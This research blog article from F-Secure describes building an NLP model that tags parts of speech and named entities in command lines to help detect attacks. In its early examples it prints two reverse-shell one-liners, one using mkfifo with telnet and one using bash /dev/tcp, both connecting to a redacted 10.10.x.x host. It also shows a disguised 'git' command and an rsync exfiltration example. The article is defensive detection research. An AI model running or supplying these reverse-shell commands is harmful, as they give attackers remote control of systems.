Operations on computer systems frequently use the command line. Applications perform simple tasks (such as software updates) via tools or scripts, sysadmins deploy jobs that run on multiple machines, and technical users spend a great deal of their time in console windows. Adversaries also heavily utilize the command line. If a system has been compromised, an attacker will perform a majority of their actions using built-in system tools, at the command line. This strategy benefits the attacker, since their actions will look very similar to other normal tasks performed on the system. Methodology designed to automatically detect whether a system has been compromised needs to be able to tell the difference between benign and malicious command line operations. In order to build mechanisms capable of classifying command lines in this way, we first need to understand what they do – in other words, we need to be able to parse them in a similar way to how we parse natural languages. This article describes the process we’ve been using to develop methodology capable of parsing and categorizing command lines at F-Secure.
In order to understand the problem space, we must first examine both benign and malicious command lines to get an idea of how we might want to parse them. We started this process by examining data collected by our own breach detection systems. Here are a few examples, from that dataset, that illustrate some of structures we’d need to parse.
rm f;mkfifo f;cat f|/bin/sh -i 2>&1|telnet 10.10.x.x 8080 > f
The command line operation above establishes a remote shell on the machine it was run on. A remote shell is a process that creates an outgoing connection on to a command-and-control (C&C) server (in this case, the computer at 10.10.x.x). Once the connection has been established, an adversary will be able to remotely access the compromised machine and perform actions on it. This type of command line operation is almost always a sign of malicious activity.
export logfile = /dev/tcp/10.10.x.x/8080 bash -i >& $logfile 0>&1
git commit –m „Init commit” –H localhost –p p4ssw0rd
The operation illustrated above is something developers will be familiar with – a commit operation to a version control system (git). However, the actual git binary doesn’t support –H or –p flags, and as such the illustrated command line was probably used to execute a different binary that was simply renamed ‘git’. Remaing a binary in this way is great for avoiding detection – if an analyst glances over a log file, they may not immediately recognize the command as bogus.
Even if the above git command were legitimate, we may still be interested in analyzing it. For instance, if the command was run on a machine belonging to a member of the finance department, it would indicate anomalous behaviour, and warrant further investigation. Even if the command was run on a developer’s machine, it could be indicative of an attacker attempting to make changes to a company’s source code.
rsync -a --timeout=60 192.168.x.x:/var/log/checkout.log.gz /tmp/check_log/42/
The example above uses rsync – a command commonly used to copy data from one host to another. This action may be indicative of an attacker gathering data for exfiltration, even if run on a developer or sysadmin machine, or on a server (places where this type of command are commonly used).
When considering the examples above, we note that in order to programmatically determine what a command line is doing, we need to isolate relevant information such as IP addresses, ports, commands, and environment variables. We can then use that information to find uncommon commands, uncommon or invalid flags and flag values, and uncommon parameters. This information can also be used to determine whether a command line exhibits unusual behaviour, uses commands that are rarely or never seen, or uses executables in uncommon ways.
Although it is technically possible to build a set of regular expressions to parse useful information from command lines, such an endeavour would be rather inefficient, and wouldn’t scale well. Writing and maintaining large numbers of regular expressions to parse the variety of common command line structures seen on a daily basis would take a great deal of time and effort. Thus, approaching this problem using modern natural language processing (NLP) techniques seems rational.
Modern NLP frameworks, such as spaCy, can be used to parse and tag documents (text written in a natural language such as English). A sentence is first tokenized (split into words), and then fed into a model that makes predictions about each word, given its context in the sentence. The model’s outputs can include several different types of prediction. One commonly used prediction is a part of speech (POS) tag indicating the word type (noun, verb, adjective, etc).
NLP models can also perform named entity recognition (NER), which is used to label “real-world” objects such as people, companies, values, or locations – such as Sebastian Thrun, Google, and 2007 in the following example.
It is possible to create powerful tools using the output of modern NLP models. Such tools can be used to identify patterns in POS tags, search for occurrences of named entities, and can also be used to create sentence dependency graphs (as depicted below).
A model that is able to parse command lines in the same way that spaCy parses natural language would be extremely useful for cyber security purposes. The output of such a model would enable the creation of powerful rules for the detection of command line patterns indicative of malicious actions, and could be fed into downstream mechanisms such as statistical models, sequential models, or clustering algorithms.
Unfortunately for us, readily available NLP models are specifically trained to parse natural languages – not command lines or scripting languages. For this reason, we decided to create our own. Our proposed model should be capable of labelling features from command lines with part-of-speech and named entity tags (as depicted below).
In order to train such a model, we first needed to collect a large enough set of relevant command lines. This task wasn’t as easy as it seemed – looking through anonymized data collected by our own systems, we noticed that many command lines were irrelevant. Some contained errors (anyone who uses the command line can attest to the fact that the commands we enter often contain typos or are invalid due to incorrect construction). Others contained unknown commands or proprietary executables – we couldn’t tell what they would do if executed, and thus labelling them would be troublesome. Building a representative set of command lines from the data we had available required us to manually remove irrelevant entries. We augmented our own data with the nl2bash dataset – a set of annotated command lines collected by the researchers who published the nl2bash paper. This dataset contains approximately 10,000 bash one-liners collected from websites such as Stack Overflow, paired with english descriptions.
The next step involved determining how to tokenize command lines. Unlike with natural languages, tokenizing a command line requires more than just splitting a string on spaces and punctuation. Consider the examples below, which have been annotated with black and red bars to indicate where we’d like to tokenize sensibly. Things like regular expressions should often not be split by spaces (underlined in red in the second example), and some parameters contain additional variables that are not even delimited by a space (shown as vertical red lines in the third example).
We opted to use bashlex, an open source Python parser for command lines, along with a few of our own rules (mostly designed to recognize specific patterns like ip_address:port_number) to tokenize our dataset. Once this step had been performed, we moved onto annotation – labelling our data. This step required quite a lot of manual work. To make this process a bit easier, we utilized doccano – an open source text annotation tool.
We built our annotation process as a feedback loop in which we started by annotating a subset of our collected command lines, trained a model using those annotations, used the model to annotate further samples, and then fixed the resulting output for the next pass. Here is an example of the interface, and POS tags we assigned during annotation:
Once we had assembled enough labelled samples, we trained a conditional random fields (CRF) model. Conditional random fields is a statistical modelling method that is used for structured prediction and is often applied to pattern recognition tasks. The CRF training process takes as input both tokens and features associated with each token, and with previous and subsequent tokens. The model’s developer designs the feature extraction process based on their goals.
We chose a number of relevant features for both POS and NER. Some examples are shown below:
We chose CRF as our model since it takes sequence context into consideration and generates explainable models. Also, CRF models work well even when trained on small amounts of data. We used python-crfsuite to implement the model, and trained it on approximately 2000 command lines collected from data gathered during one specific month. We then tested our model against approximately 1740 annotated command lines collected during a different month. The results are presented in the table below.
Our model shows a great deal of promise. Interestingly, it found errors in our own hand-annotated data that were most likely introduced during the annotation process (labelling is a rather tedious process that can quickly fatigue whoever is doing it). Here’s an example of some real-world usage:
This research represents a solid foundational precursor for command-line-based attack detection methods. The output of our model can be used to craft simple, readable rules for detecting specific types of command line activity, and can be used as input to other machine learning models and mechanisms. We plan to publish further articles on this topic as our research in this area proceeds.
This research was conducted by Zuzanna Kunik, Zuzanna Kocur, Julia Będziechowska, Bartosz Nawrotek, Paweł Piasecki, Marcin Kowiel from F-Secure’s office in Poznan, Poland, pictured below, and by Michael Gant from F-Secure’s office in Johannesburg, Republic of South Africa. We would like to especially thank Filip Olszak from Countercept Detection Response Team for consulting during the project.
This research was presented at PyData Warsaw 2019. A video of the presentation can be found here https://www.youtube.com/watch?v=_rEjSDPHxJY
This research is part of F-Secure’s Project Blackfin – a multi-year research effort aimed at investigating how to apply collective intelligence in the cyber security domain. You can learn more about it here: https://www.f-secure.com/en/about-us/research/project-blackfin